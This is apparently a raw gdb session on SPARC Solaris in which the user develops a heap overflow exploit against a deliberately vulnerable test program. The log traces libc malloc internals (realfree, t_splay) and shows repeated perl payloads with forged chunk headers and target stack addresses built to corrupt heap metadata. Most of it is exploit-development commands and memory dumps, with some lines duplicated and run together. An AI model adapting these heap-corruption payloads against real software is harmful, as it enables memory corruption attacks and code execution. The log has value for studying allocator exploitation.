0x23bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23be0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23df0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ef0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x24000: Cannot access memory at address 0x24000
(gdb)
0x24004: Cannot access memory at address 0x24004
(gdb)
0x24008: Cannot access memory at address 0x24008
(gdb) x/96x 0x20d60
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ed0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/96x 0x20d40
0x20d40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) si
0xff2c1d90 in malloc () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0x21000 135168
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeeea0 4290703008
o7 0xff2c1d8c -13886068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbeef00 4290703104
i7 0x10724 67364
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400006 -29360122 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1d90 4281081232
npc 0xff2c1d94 -13886060
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1d90 <malloc+8>: sethi %hi(0x7a000), %o1
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1dcc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1dcc <_malloc_unlocked+8>: call 0xff2c1dd4 <_malloc_unlocked+16>
0xff2c1dd0 <_malloc_unlocked+12>: sethi %hi(0x7a000), %o1
0xff2c1dd4 <_malloc_unlocked+16>: add %o0, 0x3e7, %o0
0xff2c1dd8 <_malloc_unlocked+20>: cmp %i0, %o0
0xff2c1ddc <_malloc_unlocked+24>: add %o1, 0x23c, %o1
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
(gdb) c
Continuing.
Breakpoint 5, 0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x41022a28 1090660904
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe900003 -24117245 icc:N--C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/i $pc
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
(gdb) x/i $pc-4
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
(gdb) x/x 0x22a28
0x22a28: 0x00020d60
(gdb) set $o0 = 0x22a28
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x22a28 141864
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe900003 -24117245 icc:N--C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
0xff2c2004 <_malloc_unlocked+576>: add %i4, %i3, %o0
(gdb) si
0xff2c1fe4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fe8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ffc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2000 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2004 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2008 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c200c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2010 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2014 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c240c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2410 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2414 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2418 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c241c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2420 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2424 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2428 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c242c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2430 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2434 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2438 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c243c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2444 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2448 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c244c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2474 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2478 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb)
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
The program is not being run.
(gdb) x/x 0xff2c247c
0xff2c247c <realfree+112>: Cannot access memory at address 0xff2c247c
(gdb) r
Starting program: /tmp/a.out 801
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) x/x 0xff2c247c
0xff2c247c <realfree+112>: 0xd4062008
(gdb) x/i 0xff2c247c
0xff2c247c <realfree+112>: ld [ %i0 + 8 ], %o2
(gdb) r 800
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 800
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) c
Continuing.
Program exited with code 03.
(gdb)
Starting program: /tmp/a.out `perl -e 'print "A"x800 . "\xff\xff\xff\xfc"x2 . "XXXX" . "\xff\xbe\xef\xd8" . "\xff\xbe\xef\x08" '` Program received signal SIGSEGV, Segmentation fault. 0xff2c2b40 in t_splay () from /usr/lib/libc.so.1 (gdb) backtrace #0 0xff2c2b40 in t_splay () from /usr/lib/libc.so.1 #1 0xff2c28b0 in t_delete () from /usr/lib/libc.so.1 #2 0xff2c24b4 in realfree () from /usr/lib/libc.so.1 #3 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1 #4 0xff2c1db0 in malloc () from /usr/lib/libc.so.1 #5 0x0001072c in func () at d.c:4 #6 0x000107a8 in main (argc=2, argv=0xffbeed24) at d.c:16 (gdb) [..] (gdb) x/x &n 0xffbeecac: 0x00000000 (gdb) del Delete all breakpoints? (y or n) y (gdb) r `perl -e 'print "A"x800 . "\xff\xff\xff\xfc"x2 . "XXXX" . "\xff\xbe\xec\xa0" . "\xff\xbe\xef\x08" '`
This went on to show me the hidden “8 byte offset” difference: D
bazz@blade72[pts/2][/tmp] gdb a.out
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
A" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAA
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
A" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAAA
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
^C
Program received signal SIGINT, Interrupt.
0xff31ecc0 in _read () from /usr/lib/libc.so.1
(gdb) x/x &n
No symbol "n" in current context.
(gdb) c
Continuing.
Program exited with code 03.
(gdb) list
1
2 func()
3 {
4 char *penis = malloc(300);
5 memset(penis,'B',300);
6 getchar();
7 }
8 main (int argc, char **argv)
9 {
10 int n = 5;
(gdb)
11 char *p = malloc(800);
12
13 strcpy(p,argv[1]);
14
15
16 func();
17 }
(gdb) b 17
Breakpoint 1 at 0x107a8: file d.c, line 17.
A" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAAA
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 1, main (argc=2, argv=0xffbeece4) at d.c:17
17 }
(gdb) x/x &n
(gdb) x/x 0xffbeef10
0xffbeef10: 0x41414141
(gdb) x/x 0xffbeecbc
0xffbeecbc: 0x00000000
(gdb) x/x 0xffbeeccc
0xffbeeccc: 0x00000000
(gdb) x/x 0xffbeecac
0xffbeecac: 0x00000000
(gdb) x/96x 0xffbeec7c
0xffbeec7c: 0x00010574 0x00000002 0xffbeece4 0x00000000
0xffbeec8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeec9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecac: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecbc: 0x00000000 0x00000000 0x00000002 0xffbeece4
0xffbeeccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecdc: 0x00000000 0x00000002 0xffbeee3c 0xffbeee47
0xffbeecec: 0x00000000 0xffbef19c 0xffbef1b7 0xffbef1d4
0xffbeecfc: 0xffbef1ef 0xffbef247 0xffbef26a 0xffbef28a
0xffbeed0c: 0xffbef295 0xffbef2a2 0xffbef2c6 0xffbef2e6
0xffbeed1c: 0xffbef2fd 0xffbef310 0xffbef334 0xffbef33e
0xffbeed2c: 0xffbef34a 0xffbef3a2 0xffbef8cb 0xffbef8d9
0xffbeed3c: 0xffbefa59 0xffbefa6e 0xffbefa92 0xffbefaab
0xffbeed4c: 0xffbefab4 0xffbefad8 0xffbefaf6 0xffbefce1
0xffbeed5c: 0xffbefd13 0xffbefd26 0xffbefd47 0xffbefd73
0xffbeed6c: 0xffbefd81 0xffbefde4 0xffbefe01 0xffbefe1f
0xffbeed7c: 0xffbefe40 0xffbefe56 0xffbefe68 0xffbefe89
0xffbeed8c: 0xffbefe99 0xffbefea1 0xffbefeb0 0xffbefebb
0xffbeed9c: 0xffbefed6 0xffbefee3 0xffbefef2 0xffbeff29
0xffbeedac: 0xffbeff4a 0xffbeff68 0xffbeff6f 0xffbeff90
0xffbeedbc: 0xffbeffbd 0x00000000 0x000007d8 0xffbeffda
0xffbeedcc: 0x000007de 0xffbeffed 0x00000003 0x00010034
0xffbeeddc: 0x00000004 0x00000020 0x00000005 0x00000005
0xffbeedec: 0x00000009 0x00010558 0x00000007 0xff3b0000
(gdb)
0xffbeedfc: 0x00000008 0x00000300 0x00000006 0x00002000
0xffbeee0c: 0x000007d0 0x00001caf 0x000007d1 0x00001caf
0xffbeee1c: 0x000007d2 0x00002801 0x000007d3 0x00002801
0xffbeee2c: 0x000007d9 0x00000007 0x00000000 0x00000000
0xffbeee3c: 0x2f746d70 0x2f612e6f 0x75740041 0x41414141
0xffbeee4c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee5c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee6c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee8c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeac: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeebc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeecc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeedc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeec: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeefc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef0c: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/x &n
0xffbeec6c: 0x00000005
(gdb)
0xffbeec70: 0x00000000
(gdb)
0xffbeec74: 0x00000000
(gdb)
(gdb) r `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x4c" . "AAAA" . "\xff\xff\xff\xff" . "AA
A" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x4c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 1, main (argc=2, argv=0xffbeece4) at d.c:17
(gdb) x/x &n
0xffbeec6c: 0x00000005
(gdb) x/96x &n
0xffbeec6c: 0x00000005 0x00000000 0x00000000 0xffbeec80
0xffbeec7c: 0x00010574 0x00000002 0xffbeece4 0x00000000
0xffbeec8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeec9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecac: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecbc: 0x00000000 0x00000000 0x00000002 0xffbeece4
0xffbeeccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecdc: 0x00000000 0x00000002 0xffbeee3c 0xffbeee47
0xffbeecec: 0x00000000 0xffbef19c 0xffbef1b7 0xffbef1d4
0xffbeecfc: 0xffbef1ef 0xffbef247 0xffbef26a 0xffbef28a
0xffbeed0c: 0xffbef295 0xffbef2a2 0xffbef2c6 0xffbef2e6
0xffbeed1c: 0xffbef2fd 0xffbef310 0xffbef334 0xffbef33e
0xffbeed2c: 0xffbef34a 0xffbef3a2 0xffbef8cb 0xffbef8d9
0xffbeed3c: 0xffbefa59 0xffbefa6e 0xffbefa92 0xffbefaab
0xffbeed4c: 0xffbefab4 0xffbefad8 0xffbefaf6 0xffbefce1
0xffbeed5c: 0xffbefd13 0xffbefd26 0xffbefd47 0xffbefd73
0xffbeed6c: 0xffbefd81 0xffbefde4 0xffbefe01 0xffbefe1f
0xffbeed7c: 0xffbefe40 0xffbefe56 0xffbefe68 0xffbefe89
0xffbeed8c: 0xffbefe99 0xffbefea1 0xffbefeb0 0xffbefebb
0xffbeed9c: 0xffbefed6 0xffbefee3 0xffbefef2 0xffbeff29
0xffbeedac: 0xffbeff4a 0xffbeff68 0xffbeff6f 0xffbeff90
0xffbeedbc: 0xffbeffbd 0x00000000 0x000007d8 0xffbeffda
0xffbeedcc: 0x000007de 0xffbeffed 0x00000003 0x00010034
0xffbeeddc: 0x00000004 0x00000020 0x00000005 0x00000005
xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0AAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\
AA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) b *0xff2c1f98
Breakpoint 2 at 0xff2c1f98
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
AA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
(gdb) x/15i $pc
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
